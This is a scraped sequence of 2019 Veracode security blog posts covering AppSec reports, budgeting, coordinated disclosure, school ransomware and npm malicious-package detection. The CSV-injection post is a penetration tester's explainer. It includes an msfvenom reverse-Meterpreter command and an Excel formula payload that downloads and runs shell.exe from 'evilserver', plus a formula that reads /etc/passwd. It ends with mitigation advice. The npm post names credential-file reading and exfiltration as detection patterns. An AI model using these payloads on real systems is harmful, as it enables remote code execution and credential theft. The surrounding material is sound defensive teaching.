your risk of a breach.</p> <p>Ultimately, integrating Veracode Dynamic Analysis into your CI/CD pipeline will help to make your web applications more secure. To learn more about setting up this integration, please <a href="">visit the Veracode Help Center</a> or reach out to Veracode Support.</p> Wed, 30 Oct 2019 12:45:04 -0400 (mkvitnitsky) ver44216 Announcing the 10th Volume of our State of Software Security Report <img src="/sites/default/files/styles/resize_960/public/SOSS10-Blog-Header-min.png?itok=osnFJBWZ" width="960" height="378" typeof="foaf:Image" /><p>Today marks a big milestone for Veracode, and for the application security industry ??? we???re releasing the 10<sup>th</sup> volume of our <em>State of Software Security</em> (SOSS) report. 10 SOSS reports and 80,000+ apps later, we???ve accumulated a lot of data, and a lot of insights, about application security trends and best practices. This year, we took a look back at the AppSec picture over the past 10 years, and dug into the data amassed from our security scans from April 2018 to March 2019. Some big takeaways:</p> <p><strong>The more things change, the more they stay the same: </strong>We???ve seen some positive movement this year, but we???ve got a long way to go. The same vulnerabilities are populating the top 10 list, and the percentage of applications that have at least one vulnerability on initial scan has remained high and stagnant over the past 10 years. Secure coding training is clearly still a critical component of any security program.</p> <p><strong>We???ve moved beyond just finding flaws to fixing them:</strong> Our VP of Services Pejman Pourmousa was recently quoted saying, ???you can???t scan your way to secure code.??? And that sentiment appears to be gaining momentum. This year???s data, especially compared to data over the past 10 years, reveals that developers are indeed focused on fixing the security flaws they find more than ever before. For example, half of applications showed a net reduction in flaws over the sample time frame. Another 20% either had no flaws or showed no change. This means 70% of development teams are keeping pace or pulling ahead in the flaw-busting race!</p> <p><strong>Security debt is piling up:</strong> Although fix rates are improving, most organizations are prioritizing newly found security flaws, while letting older, unaddressed flaws linger. This accumulation of security debt is both illustrated in our SOSS data and has started to emerge as a pain point in our conversations with customers. But this year???s data also provides some compelling evidence surrounding steps organizations can take to start chipping away at that debt. In particular, organizations that are scanning the most are carrying 5x less security debt than those scanning the least.</p> <p>See below for the data highlights, and check out the <a href="//">full report</a> for all the data details, plus our advice on how to use the story told by the numbers to improve your own application security program.</p> <p>&nbsp;</p> <div style="text-align:center;"><img alt="SoSS Infographic" src="//" title="SoSS Infographic"></div> Tue, 22 Oct 2019 08:37:34 -0400 (sciccone) ver44041 Beyond Testing: The Human Element of Application Security <img src="/sites/default/files/styles/resize_960/public/human_element_AppSec.png?itok=JRCQxNXZ" width="960" height="480" typeof="foaf:Image" /><p>Companies of every size and in every industry are changing the world with software. From healthcare to agriculture, education, and manufacturing, software is enabling unprecedented advancement and innovation. But if that software is insecure, these innovations may get held up, or worse, put us at risk. And this is a very real concern; our most recent <em><a href="//">State of Software Security report</a></em> found that 83 percent of applications had at least one vulnerability on initial scan. In turn, testing the security of software and addressing any security-related defects is a critical undertaking.</p> <p>However, it???s important not to lose sight of the fact that effective application security secures software throughout its entire lifecycle ??? from inception to production. With the&nbsp;speed of today???s development cycles ??? and the speed with which software changes and the threat landscape evolves ??? it would be foolish to assume that code will always be 100 percent vulnerability-free after the development phase, or that code in production doesn???t need to be tested or, in some cases, patched.</p> <p>An effective application security program requires some ???human??? elements beyond testing, including:</p> <p><strong>Developer secure coding training</strong>, because the vulnerability that is never introduced will always be the cheapest and easiest to fix. Most developers don???t receive training on secure coding, either in school or on the job, but when they do, it pays off. Data collected for our <em>State of Software Security</em> report found that eLearning on secure coding&nbsp;improved developer fix rates by 19 percent.</p> <p><strong>A solid vulnerability disclosure policy</strong>, which ensures that vulnerabilities unearthed by security researchers are addressed and disclosed in an effective manner. Veracode???s co-founder and CTO Chris Wysopal notes that, ???Today, we have both tools and processes to find and reduce bugs in software during the development process. But even with these tools, new vulnerabilities are found every day. A strong disclosure policy is a necessary part of an organization???s security strategy and allows researchers to work with an organization to reduce its exposure. A good vulnerability disclosure policy will have established procedures to work with outside security researchers, set expectations on fix timelines and outcomes, and test for defects and fix software before it is shipped.???</p> <p><strong>Bug bounty programs</strong>, which put the power of multiple security researchers behind your application security. Wysopal says of bug bounty programs, ???bringing in outside hackers with their own attack tools will uncover new risks. This is one of the clear values of bug bounty programs.???</p> <p>Ultimately, effective application security focuses on both prevention and detection. You wouldn???t let your kids play with matches just because you have a fire extinguisher. On the other hand, even if you teach your kids about fire safety and never let them play with matches, you wouldn???t toss out the fire extinguisher. Fire safety requires prevention and detection, as does application security.</p> <p>Testing your code for vulnerabilities early and often in the development process, and assessing the security of both third-party and open source code are all essential software security steps. But detecting and responding to vulnerabilities with human solutions plays a critical part as well. Developer training, a vulnerability disclosure policy, and a bug bounty partnership all play a role.</p> <p>Continue this conversation with us at our <a href="//">fall road show</a>; we???ve teamed up with Bugcrowd and Edgewise on a series of networking events -- coming to a city near you!</p> Tue, 15 Oct 2019 14:23:50 -0400 (sciccone) ver43976 Making the Case for AppSec? Break Down Your Budget <img src="/sites/default/files/styles/resize_960/public/breaking_down_AppSec_budget.png?itok=lBBG9Nx8" width="960" height="480" typeof="foaf:Image" /><p>The bottom line on corporate decision-making comes down to the bottom line. It???s critical to demonstrate value for any new or expanded initiative. Fall short, and your odds of success are greatly diminished.</p> <p>How do you build the financial case for more robust AppSec, when the focus is on the impact to the bottom line? The key is understanding how to effectively design and present a budget that makes sense to your stakeholders. A crucial element is to recognize that stakeholders need options and choices. By breaking down your budget into categories such as ???must do,??? ???should do,??? and ???could do,??? you???ll greatly increase the odds of securing the budget you need. It???s a lot harder to say no to several different options than to one plan and one number.</p> <h4><strong>Breaking It Down</strong></h4> <p>You most likely have a range of priorities within your AppSec initiative that you???d like funding for ??? the must do, should do, and could do activities you and your team want to execute. If you break down your ???ask??? into these three categories, you give your stakeholders options regarding what they can approve. For example, you might offer the following budget options:</p> <p><strong>Must</strong>: We <strong><em>must</em></strong> comply with industry regulations regarding AppSec. Whether it???s PCI, HIPAA, or NY DFS cybersecurity regulations, non-compliance is not an option, and getting budget to address regulations shouldn???t take much convincing.</p> <p><strong>Should: </strong>We<strong><em> should</em></strong> assess code with <a href="//">static analysis</a>, eliminate all ???high??? or ???very high??? severity flaws, and <a href="//">train developers</a> on secure coding. Getting at the most-likely-to-be-exploited vulnerabilities and cutting down on the new vulnerabilities being introduced into your code is a good place to start.</p> <p><strong>Could: </strong>We<strong><em> could</em></strong> employ <a href="//">multiple testing techniques</a> beyond static analysis and eliminate the ???medium??? severity flaws as well. Ultimately, static analysis is a good starting point, but truly effective AppSec requires several testing types that find different vulnerabilities in different ways, including dynamic analysis, software composition analysis, and manual penetration testing.</p> <p>The right frameworks can help guide you through this budget breakdown. For instance, the <a href="//">Veracode Verified</a> program provides best-practice AppSec roadmap you can use to show a clear path forward. It can also help you break down the must/could/should items. The ability to show progress and defend your budget is essential to getting the backing your need from key executives. You also don???t want to stall at the ???must??? budget, but show a path toward the most effective and efficient AppSec program.</p> <h4><strong>Additional Budget Selling Points</strong></h4> <p>After breaking down your budget to give stakeholders options, you can create urgency around the spend by finding an event or series of events that demonstrate the seriousness of the issue. This includes data about code vulnerabilities, incidents, and breaches, and what direct and indirect costs grow out of these events. For example, British Airways was recently <a href="//">fined ツ」185 million</a> for its data breach.&nbsp;&nbsp;</p> <p>In addition, <a href="">highlight efficiencies</a> gained by your program. For example, demonstrate how an integrated and automated program will free staff from cumbersome and time-consuming processes, or how teams will be able to better focus on innovation.</p> <p>Finally, a good foundation for any business case is industry stats or benchmarks. Consider adding these data points into your pitch. You can find some in our <a href="//"><em>State of Software Security</em></a> report or consider the <a href="">OpenSAMM</a> model.</p> <h4><strong>On the Money</strong></h4> <p>Ultimately, any presentation should deliver only the most relevant points in a digestible format. Busy executives want to know whether a project will have a positive impact and what that positive impact will be. In order to become an effective change agent, keep your proposal and budget request limited to a half a dozen key points, and be sure to focus on the issues that matter to specific executives.</p> <p>Remember, a robust AppSec program is a multi-year endeavor, and keeping the funding stream flowing is critical. In order to do this, budget requests must be tied to <a href="//">metrics, KPIs, and other measures</a>. You must demonstrate ongoing success and show results in real-world ways that truly matter to business leaders and your enterprise. With buy-in from key stakeholders, your odds of obtaining essential funding and support are high. And that, in the end, is a formula for a more secure enterprise.</p> <p>For more details on making the case for AppSec budget, see our new guide, <a href=""><em>Building a Business Case for Expanding Your AppSec Program</em></a>.</p> Thu, 10 Oct 2019 09:59:58 -0400 (sciccone) ver43861 Know Your Audience to Make the Case for AppSec <img src="/sites/default/files/styles/resize_960/public/Know_Audience_AppSec_Pitch-min.png?itok=2ZCs-9xY" width="960" height="480" typeof="foaf:Image" /><p>Selling senior-level executives on any new concept can often feel like a trek up a mountain with a 60-pound pack on your back. So, <a href="">how can you take your application security program to a new and better level with less effort?</a> You focus on what???s really important: getting the right message to the right audience in a language they speak and connect with. Because when people hear things in terms that matter to them ??? and there???s persuasive evidence on hand ??? they stop resisting and even embrace the change.</p> <p>But sending one message to the multiple leaders involved in a decision-making process is a mistake. Refining your message appropriately by focusing on the information relevant to each group will help you build credibility, more effectively communicate your vision, and more easily gain buy-in. It???s an approach that extends far beyond AppSec, but it has particular relevancy in this space.</p> <h4><strong>On Target</strong></h4> <p>Any successful salesperson understands that it???s easier to close a sale when you communicate selling points that really matter to your audience. The same holds true when you are ???selling??? AppSec internally. Your success hinges on understanding your strategic arc over the course of months and years, establishing metrics and KPIs that demonstrate your progress, and connecting all of this to tangible benefits for the people who hold the purse strings and can greenlight your initiative, and whose support you need for the successful implementation and administration of your program.</p> <p>You can gain the support you need by building a basic <a href="">business case</a> for the key groups in your organization, and ensuring that each stakeholder receives the specific information they need in words, figures, and graphics they understand. Whether it???s showing them how your AppSec program cuts costs, scales up efficiencies, fuels your DevOps strategies, or improves the company???s overall trust with business partners and customers, hitting the target matters. It???s crucial to document actual problems and incidents, and then use company data to support your case.</p> <h4><strong>First Things First</strong></h4> <p>Here are six key ways to gain C-suite executive buy-in for AppSec:</p> <ul> <li><strong>Avoid acronyms and technical jargon.</strong> Nothing confuses and distracts business leaders more than the use of unnecessary technical terms.</li> <li><strong>Use visuals instead of text.</strong> Display risks and potential costs in graphics that clearly illustrate potential losses and damage. Rely on numbers, and especially actual dollar figures, to gain credibility. And be sure to refine your message appropriately for each executive. For example, telling your CFO that you???ve reduced SQL injection vulnerabilities by 30 percent most likely won???t resonate. Your CFO wants to know the actual business value of reducing breaches. The CISO wants to understand how AppSec ties into the overall information security program, and the CIO is concerned with the cost of deliver/service and the cost of downtime. Know your audience???s priorities, and speak their language.</li> <li><strong>Forget ???features??? and emphasize ???risks.???</strong> Avoid a discussion about specific security products and what they can do ???you run the risk of being seen simply as a technologist rather than a strategic partner. Instead, build a case around potential brand damage with industry metrics, benchmarks, and potential costs. Nearly two-thirds of company directors who responded to a Veracode and NYSE Governance Services <a href="">survey</a> said they prefer high-level strategy descriptions and risk metrics over information about security technologies.</li> <li><strong>Identify your organization???s pain points.</strong> Find a compelling event, such a recent high-profile security breach, a prospect asking for a security audit, or even a lost sale due to security issues. Present actual data from past incidents to demonstrate how your organization will benefit with AppSec.</li> <li><strong>Pinpoint pet projects.</strong> Find something key stakeholders have a burning interest in, and make that your focus. For instance, if your organization???s customers are expressing concerns about privacy and security to your customer service reps, and one of your stakeholders is taking the lead on that issue, attach your cause to that issue. Quantifying the extent of the problem and presenting it to your leaders in a way that clearly illustrates how effective your solutions could be will likely sway decision-makers in your favor.</li> <li><strong>Focus on dollars.</strong> The same survey noted above found that among the 200 directors of public companies across a wide swath of industries who responded, 41 percent cited the cost of brand damage ??? including cleanup, lawsuits, forensics, and credit reporting costs ??? as a top concern.</li> </ul> <p>Ultimately, anyone selling an AppSec program to their organization???s top decision-makers should take the time to identify risk benchmarks as compared to their industry peers ??? and what these mean in both practical terms and actual dollars. A focus on real-world issues and results, tied to what matters for specific stakeholders, can significantly boost your odds of success.</p> <p>For more information about how to promote AppSec, check out our new guide, <a href=""><em>Building a Business Case for Expanding Your AppSec Program</em></a>.&nbsp;</p> Thu, 26 Sep 2019 14:34:43 -0400 (sciccone) ver43726 Security and Development Agree, Coordinated Disclosures Are a Public Service <img src="/sites/default/files/styles/resize_960/public/coordinating_vulnerability_disclosure-min.png?itok=vyUJhO2-" width="960" height="480" typeof="foaf:Image" /><p><a href="//">Shifting security left</a> so that security testing becomes an integrated part of the development process helps companies improve software security. With software running our world, it is important to empower developers with the tools and processes they need to make security a part of their overall development process. Yet, even with a robust AppSec program that makes security a part of the development process, new vulnerabilities are found all the time. Companies need ways to find vulnerabilities once software is released. That???s where coordinated disclosure policies come into play.</p> <p>Coordinated disclosure policies allow security researchers to work with an organization to help them improve the security of their software. The conversation around vulnerability disclosure has become more nuanced over the past several years. What was once a topic that would spur intense debate is now one that invites discussion on strategy and best practices. Organizations as <a href="">conservative as federal and state agencies</a> are exploring the need for coordinated disclosure processes.</p> <p>Veracode recently commissioned a <a href="">report with 451 Group</a> to explore the attitudes and perceptions around coordinated disclosure. Our intent in commissioning this research was to establish a current view of perceptions around coordinated vulnerability disclosure and to define a set of clear recommendations that help businesses progressively deliver on the objective of developing software that is secure from the start.</p> <p>The report showed that 90 percent of security and development professionals believe coordinated disclosure serves a public good. This same report also found that one-third of organizations received an unsolicited vulnerability alert in the past 12 months ??? and that 90 percent of these were done in a coordinated manner, in which the independent security researcher worked with the company to fix the vulnerability.</p> <p>As Chris Wysopal, Veracode CTO, commented on the report:</p> <p><em>???The alignment that the study reveals is very positive,??? said Veracode Chief Technology Officer and co-founder Chris Wysopal. ???The challenge, however, is that vulnerability disclosure policies are wildly inconsistent. If researchers are unsure how to proceed when they find a vulnerability it leaves organizations exposed to security threats giving criminals a chance to exploit these vulnerabilities. Today, we have both tools and processes to find and reduce bugs in software during the development process. But even with these tools, new vulnerabilities are found every day. A strong disclosure policy is a necessary part of an organization???s security strategy and allows researchers to work with an organization to reduce its exposure. A good vulnerability disclosure policy will have established procedures to work with outside security researchers, set expectations on fix timelines and outcomes, and test for defects and fix software before it is shipped.???</em></p> <p>Past perceptions around independent security researchers were that they were motivated by money from bug bounty programs or would blackmail a company into paying them for the vulnerability information. This study showed that this perception is far from the truth. Only 18 percent of security researchers expect to be paid for finding a vulnerability, and only 16 percent expect some sort of recognition. Conversely, 37 percent expect information validating the fix ??? suggesting independent researchers are more interested in creating more secure software than notoriety or financial gain.</p> <p>The good news is most companies today have an established process for working with independent security researchers. When coordinated disclosure programs become part of an overall software security strategy along with a DevSecOps program that integrates security testing right into the development process, we all benefit from the software powering our world being more secure.</p> <p>See highlights from the report???s findings in the infographic below.</p> <p> <div class="media media-element-container media-default"> <div id="file-23416" class="file file-image"> <div class="content"> <img style="" alt="" title="" class="media-element file-media-responsive media-wysiwyg-align-left" src="//" height="4823" width="792"> </div> </div> </div></p> <p>&nbsp;</p> Wed, 18 Sep 2019 16:14:11 -0400 (lpaine) ver43306 Why Are Schools Increasingly Targeted by Cyberattackers? <img src="/sites/default/files/styles/resize_960/public/cyberattacks_schools.png?itok=aLHN6L-D" width="960" height="480" typeof="foaf:Image" /><p>Schools, including universities, are increasingly becoming cyberattack targets. Just this month, the <a href="">Monroe-Woodbury</a> school district in Orange County, NY had to delay the start of school due to cyberattacks. And this incident was only one of a handful of cyberattacks on New York state school districts this summer. One school system, <a href="">Rockville Centre in Nassau County</a>, paid a cyberattacker $88,000 after a ransomware attack shut down the district???s mainframe.</p> <p>And New York is not alone. This summer, school districts in <a href="">Oklahoma, New York, and Virginia</a> have been victims of ransomware. The Louisiana governor declared a state of emergency after multiple ransomware attacks crippled several school districts, and <a href="">schools in Flagstaff, AZ</a> closed for two days this month last due to a ransomware attack.</p> <p>The attacks don???t stop after grade 12 either. <a href="">Two universities</a>, Regis University in Denver, CO and Stevens Institute of Technology in Hoboken, NJ, were also targeted right before the start of this school year:</p> <p>Anthony Carfora of the Lupinskie Center for Curriculum, Instruction and Technology said in an interview with CBS New York, ???Ransomware is prolific right now and there???s more of it going on in government and education institutions than in private industry. We seem to be targets now.???</p> <h4><strong>Why are schools being targeted?</strong></h4> <p>Schools??? appeal to cyberattackers stems, in part, from the fact that most <a href="">don???t have robust cybersecurity systems or personnel</a> and struggle to prevent and respond to attacks. They have the added challenge of needing to give their students and teachers the academic freedom to learn and explore and do research. This often requires a more lax security posture than the locked down environment of an enterprise. They also house a lot of sensitive data, and are heavily reliant on software.</p> <p>Another wrinkle: the users of that software might find it worthwhile to take a look under the hood. Veracode co-founder Chris Wysopal notes that, ???schools use a lot of applications, which put them at the mercy of their vendors to build secure software, and requires that they have a good coordinated disclosure process to respond to security researchers, who in their case are often going to be students.???</p> <p>Just last month at DEF CON, a teenager presented on all the vulnerabilities he found over the past three years in his school???s educational software. <a href="">Wired</a> reported that the teen ???found a series of common web bugs in [the software], including so-called SQL-injection and cross-site-scripting vulnerabilities ??ヲ those bugs ultimately allowed access to a database that contained 24 categories of data, everything from phone numbers to discipline records, bus routes, and attendance records.???</p> <p>After he reported the flaws to the two software companies, he got little to no response. That is, until he used one of the vulnerabilities to trigger a push notification saying ???hello??? to all users. The software companies responded, and one has stated that it???s working to improve its vulnerability disclosure program.</p> <h4><strong>Steps schools can take</strong></h4> <p>Beyond working with vendors to ensure the security of software they are purchasing, and developing robust vulnerability disclosure programs, Wysopal recommends that schools consider ???separating the administration network, which has the sensitive data the school needs to operate, from the teaching or lab network, where this data isn???t needed.??? In this way, the school can maintain the academic freedoms while compartmentalizing data to reduce risk.</p> <p>Want more security news and best practices? <a href="">Subscribe</a> to our content.</p> Thu, 12 Sep 2019 12:30:04 -0400 (sciccone) ver43136 Data Extraction to Command Execution CSV Injection <img src="/sites/default/files/styles/resize_960/public/Avoiding%20CSV%20injection.png?itok=Gy0gjwO_" width="960" height="480" typeof="foaf:Image" /><p>As web applications get more complex and more data driven, the ability to extract data from a web application is becoming more common. I work as a principal penetration tester on Veracode???s MPT team, and the majority of web applications that we test nowadays have the ability to extract data in a CSV format. The most common software installed in corporate environments is Microsoft Excel, and this software has the ability to open CSV files (in most cases, this is the default). It should be noted that this type of attack would also affect LibreOffice as it would also interpret the payload as formula.</p> <h4><strong>Attack Requirements</strong></h4> <p>In order to perform a basic attack, a number of requirements are needed. An attacker needs the ability to inject a payload into the tables within the application. The application needs to allow a victim to download this data into CSV format that can then be opened in Excel. This would cause the payload to be interpreted as an Excel formula and run.</p> <h4><strong>Basic Attack</strong></h4> <p>1. Search the application to find a location where any data input can be extracted.</p> <p> <div class="media media-element-container media-default"> <div id="file-23171" class="file file-image"> <div class="content"> <img style="" alt="" title="" class="media-element file-media-responsive" src="//" height="64" width="409"> </div> </div> </div></p> <p>2. Inject Payload =HYPERLINK(???<a href="http://www.veracode/">http://www.veracode</a>.com ???, ???Click for Report???)</p> <p> <div class="media media-element-container media-default"> <div id="file-23176" class="file file-image"> <div class="content"> <img style="" alt="" title="" class="media-element file-media-responsive" src="//" height="58" width="382"> </div> </div> </div></p> <p>3. Confirm the application is vulnerable to this type of attack. Extract the data and confirm the payload has been injected by opening the CSV file in Microsoft Excel.</p> <p> <div class="media media-element-container media-default"> <div id="file-23181" class="file file-image"> <div class="content"> <img style="" alt="" title="" class="media-element file-media-responsive" src="//" height="328" width="443"> </div> </div> </div></p> <p>4. You can then see a ???Click for Report link??? in the Excel File. This indicates the payload has been injected correctly.</p> <p> <div class="media media-element-container media-default"> <div id="file-23186" class="file file-image"> <div class="content"> <img style="" alt="" title="" class="media-element file-media-responsive" src="//" height="202" width="557"> </div> </div> </div></p> <p>In this scenario, when the victim clicks on the link, it will take them to the Veracode website. This type of attack might not seem too serious, but consider the following:</p> <p>Instead of redirecting an end user to the Veracode website, we could redirect the end user to a server we controlled, which contained a clone of the website. We could then ask the victim to authenticate to our clone website, allowing us as the attacker to steal his or her credentials. We could then use these credentials on the original website and have access to all his or her personal information or any functionality the account has access to. There are also a number of other attacks possible with this type of formula injection, including exfiltrating sensitive data, obtaining remote code execution, or even reading the contents of certain files under the right circumstances. We can look at one of these types of attacks below.</p> <h4><strong>Advance Attack ??? Remote Command Execution</strong></h4> <p>A more advanced attack would use the same method as above but with a different payload, which would lead to remote code execution. This type of attack does depend on a number of factors and might not always be possible. However, it???s still worth considering and also highlights how serious this vulnerability can be under the right circumstances.</p> <h4><strong>Attack in Steps </strong></h4> <p>1. We???ll use a shell.exe file, which can contain whatever we want to execute on the system but, in this scenario, we will use msfvenom to create a reverse Meterpreter payload.</p> <p>msfvenom -p windows/meterpreter/reverse_tcp&nbsp; -a x64 --platform Windows LHOST=&lt;IP Address&gt; LPORT=1234 -f exe &gt; shell.exe</p> <p>2. We also need to set up a listener that will wait for the connect back to us once the shell.exe payload has been executed on the victim???s machine. We will use Metasploit multi/handler for this example. We need to set the LPORT and also make sure the IP address is correct.</p> <p> <div class="media media-element-container media-default"> <div id="file-23191" class="file file-image"> <div class="content"> <img style="" alt="" title="" class="media-element file-media-responsive" src="//" height="396" width="727"> </div> </div> </div></p> <p>3. We also need to host the shell.exe payload so it can be downloaded. For this, I used the following command, python -m SimpleHTTPServer 1337, which will set up a simple web server in the current directory on my system. A real attack might host this on a compromised web server.</p> <p>4. Once all this has been set up, we could then inject the payload into the application and wait for a victim to download the CSV file and click on the cell with the payload in it.</p> <p>=cmd|' /C powershell Invoke-WebRequest "<a href="http://evilserver:1337/shell.exe">http://evilserver:1337/shell.exe</a>"</p> <p>-OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1</p> <h4><strong>Breakdown of Payload</strong></h4> <ul> <li>The first line is calling cmd, which gets passed to the PowerShell Invoke-WebRequest to download a shell.exe file from our evilserver on port 1337. Note that if the host is running PowerShell version 2, the Invoke-WebRequest won???t work.</li> <li>The next line is saving the shell.exe file into the temp directory. The reason we use the temp directory is because it???s a folder anyone can write to.</li> <li>We then start a process to execute the downloaded shell.exe payload.</li> </ul> <p>5. Once the victim opens the file, the CSV injection payload would run. However, it may present a ???Remote Data Not Accessible??? warning. The chances are that most victims would think the file has come from a legitimate source and so they need to select yes to view the data. It should also be noted that in this scenario the Excel file is empty apart from our payload. In a real-world attack, the Excel file would be populated with information from the application.</p> <p>6. Once the victim selects yes, within a few moments, Metasploit will get a reverse connect from the victim???s host.</p> <p> <div class="media media-element-container media-default"> <div id="file-23196" class="file file-image"> <div class="content"> <img style="" alt="" title="" class="media-element file-media-responsive" src="//" height="271" width="770"> </div> </div> </div></p> <p>7. At this point, the attacker can perform a number of tasks depending on the level of access he or she has obtained. This includes, but is not limited to, stealing passwords in memory, attacking other systems in the network (if this host is connected to a network), taking over uses??? webcams, etc. In fact, under the right circumstances, it would be possible to compromise an entire domain using this attack.</p> <p>When testing for CSV injections, in most instances, a tester will use a simple payload. This is due to a number of reasons. It???s not uncommon for a tester to demonstrate this type of attack by using a Hyperlink payload like the one above, or a simple cmd payload like the following =cmd|???/C cmd.exe ???!???A.</p> <p>Some might also use the following payload depending on the operating system: ='file://etc/passwd'#$passwd.A1</p> <p>This would read the first line within the etc/passwd file on a Linux system.</p> <h4><strong>Mitigating the Risk</strong></h4> <p>The best way to mitigate against this type of attack is to make sure all users??? inputs are filtered so only expected characters are allowed. Client-supplied inputs should always be considered unsafe and treated with caution when processing. CSV injection is a side effect of bad input validation, and other types of web attacks are due to weak input validation. To mitigate against CSV injections, a default-deny regular expression or ???whitelist??? regular expression should be used to filter all data that is submitted to the application. Because Excel and CSV files utilize equals signs (=), plus signs (+), minus signs (-), and ???At??? symbols (@) to denote formulas, we recommend filtering these out to ensure no cells begin with these characters. Any element that could appear in a report could be a target for Excel / CSV injections and should be further validated for CSV injection.</p> <p>In summary, CSV injection is not a new attack vector, but it???s one that developers often forget about. As more web applications have the ability to extract data, it???s one that could have serious consequences if steps are not taken to mitigate the risk it poses. In addition, developers should be checking user input for other types of attacks like XSS.</p> <p>&nbsp;</p> Fri, 06 Sep 2019 10:40:38 -0400 (jrougvie) ver43091 Discovering Malicious Packages Published on npm <img src="/sites/default/files/styles/resize_960/public/malicious_package_discovery.png?itok=Y7eRFkrB" width="960" height="480" typeof="foaf:Image" /><p>Sightings of malicious packages on popular open source repositories (such as npm and RubyGems) have become increasingly common: just this year, there have been several reported incidents.</p> <p>This method of attack is frighteningly effective given the widespread reach of popular packages, so we've started looking into ways to discover malicious packages to hopefully preempt such threats.</p> <h4><strong>The problem</strong></h4> <p>In November 2018, a malicious package named ???flatmap-stream??? was discovered as a transitive dependency of a popular library, ???event-stream,??? with 1.4 million weekly downloads. Here, the attacker gained publishing rights through social engineering, targeting a package that was not regularly maintained. The attacker published an updated version, ???3.3.6,??? adding malicious code to steal cryptocurrency. This went undetected for two to three months.</p> <p>In a separate incident from June 2019, a malicious package ???electron-native-notify??? was discovered to be stealing sensitive information, such as cryptocurrency wallet seeds and other credentials. The attacker waited for the package to be consumed by another popular library before introducing malicious code into subsequent releases. This was also undetected for two to three months.</p> <h4><strong>Detection of the problem</strong></h4> <p>Malicious packages tend to exhibit a number of common patterns. To understand the common patterns contained in malicious packages, we looked at a past research paper, ???Static Detection of Application Backdoors??? (<a href="//"></a>), as well as going through publicly reported incidents to come up with the following list.</p> <p><em>Obfuscation</em></p> <p>Malicious packages tend to hide payloads using encoding methods such as base64 and hex. Such APIs are typically used only by libraries, which implement low-level protocols or provide utility functions, so finding them is a good indicator that a package is malicious.</p> <p><em>Reading of sensitive information</em></p> <p>Sensitive information is data from the environment, which libraries should only be reading with good reason. This includes files like ???/etc/shadow,??? ???~/.aws/credentials,??? or SSH private keys.</p> <p><em>Exfiltration of information</em></p> <p>Libraries are unlikely to contact hardcoded external servers; this is something more commonly done in downstream applications. Malicious libraries tend to do this to exfiltrate information, so we look for such occurrences.</p> <p><em>Remote code execution</em></p> <p>A pre-install or post-install script is a convenient way of running arbitrary code on a victim's machine. Payloads may also be downloaded from external sources.</p> <p><em>Typo-squatting</em></p> <p>While typo-squatted packages are not always malicious, they are a red flag. We deem typo-squatted packages as malicious, since they may provide the exact same functionality and interface, and may update their payload when the package becomes dependent on other popular packages.</p> <h4><strong>Implementation of a detector for malicious packages</strong></h4> <p>To find malicious packages in the wild, we wrote specific, lightweight static analyses for each pattern and ran them over our dataset of npm packages, looking for packages flagged by one or more detectors. False positives were expected; the plan was to narrow the number of candidates to the point where manual verification was feasible.</p> <p>Two example analyses:</p> <ul> <li>To find hardcoded external URLs, we extracted URL-like string literals from the abstract syntax trees of JavaScript source files.</li> <li>To detect typo-squatting, we looked for package names with a maximum Levenshtein distance of 2 between the names of the top 1000 packages, e.g., ???mogobd??? vs. ???mongodb.???</li> </ul> <p>We ran these only on the latest versions of packages.</p> <h4><strong>Results</strong></h4> <p>The full analysis took less than a day and uncovered 17 new malicious packages:</p> <p>* axioss</p> <p>* axios-http</p> <p>* body-parse-xml</p> <p>* sparkies</p> <p>* js-regular</p> <p>* file-logging</p> <p>* mysql-koa</p> <p>* import-mysql</p> <p>* mogodb</p> <p>* mogobd</p> <p>* mogoose</p> <p>* mogodb-core</p> <p>* node-ftp</p> <p>* serializes</p> <p>* serilize</p> <p>* koa-body-parse</p> <p>* node-spdy</p> <p>We disclosed these malicious packages to the npm security team, and they were yanked from the registry.</p> <p>Most of the malicious packages above hide their payloads as a ???test??? and use pre-/post-/test-install scripts to exfiltrate information. For example, ???node-ftp??? exposes the host information of the victim by sending the values of ???os.hostname(),??? ???os.type(),??? ???os.uptime(),??? and ???os.tmpdir()??? to its server at ???</p> <h4><strong>Disclosure timeline</strong></h4> <p>The disclosure timeline was as follows:</p> <ul> <li>2019-07-31 Discovery of malicious packages</li> <li>2019-08-01 Disclosure to npm security team</li> <li>2019-08-01 Acknowledgement from npm security team</li> <li>2019-08-01 Packages yanked from npm</li> <li>2019-08-02 Vulnerability database updated</li> <li>2019-08-30 Public disclosure on npm security advisories (<a href="" target="_blank"></a> to <a href=""></a>)</li> </ul> <h4><strong>Conclusion</strong></h4> <p>This activity of finding undetected malicious packages has further confirmed our suspicions of the existence of harmful libraries out in the open, and is only the beginning of our quest to efficiently overturn all stones to reduce potential threats. To do this, we intend to perform more regular, automated, and thorough audits on public packages, then generalize these techniques for other package managers like RubyGems.</p> Wed, 04 Sep 2019 10:35:46 -0400 (mang) ver43046 Tips for Kicking Off Your Veracode Security Program Manager Relationship <img src="/sites/default/files/styles/resize_960/public/SPM_relationship.png?itok=X7Qu00Z9" width="960" height="480" typeof="foaf:Image" /><p>If you???re a Veracode customer, there???s a good chance that you???ve heard of ??? or maybe even work with ??? a <a href="//"><strong>Veracode security program manager</strong></a> (SPM). For those of you who might not know, SPMs help you define the goals of your application security program, onboard your team, answer any questions about Veracode products, and work with your teams to ensure that your program stays on track and continues to mature.</p> <p>If you???re just kicking off your relationship with your program manager, you might be wondering what to expect on your initial calls, and how you can make the most out of the time you spend interacting with each other. Here are a few things you should keep in mind:</p> <h4><strong>How are you developing software?</strong></h4> <p>To realize the value of your investment, we need to understand how your development process works. Right off the bat, your security program manager will want to talk about your existing tech stack (aka ??? the technology you???re currently using to make your software). There???s a good chance that your organization could be in a different place at the time of your kickoff call compared to where it was when your sales cycle closed. Yes, your account executive will tell your program manager all that he or she knows about your status at the time of closing, but in case anything <em>does</em> change, it???s better to hear everything straight from the horse???s mouth. Helping us understand the size of your software footprint is also key ??? are you licensed for 10 apps, but have a total of 300, or 3,000? How are they governed from a development and security standpoint? Having everyone on the same page on these basics is a good first step towards maturing your AppSec program.</p> <h4><strong>Who are the key players?</strong></h4> <p>You should also have a clear idea of what your organizational layout is, as well as who the key players are on the development and security sides. Your SPM will know who your key players are, but they likely won???t have met them and interacted with them as much as the account executive has. In addition, if your sales cycle has been particularly long, it???s possible the key players have changed. Be prepared to fill your security program manager in on everyone who has a stake in your AppSec program on the development AND security sides of your organization. Additionally, if there???s any turnover within your company down the line, knowing everyone who???s involved will ensure that SPMs have multiple stakeholders with program context who they can go to in order to keep momentum.</p> <p>SPMs will also want to know the informal structure of your organization, or the ???politics.??? It can be helpful to know if your development and security 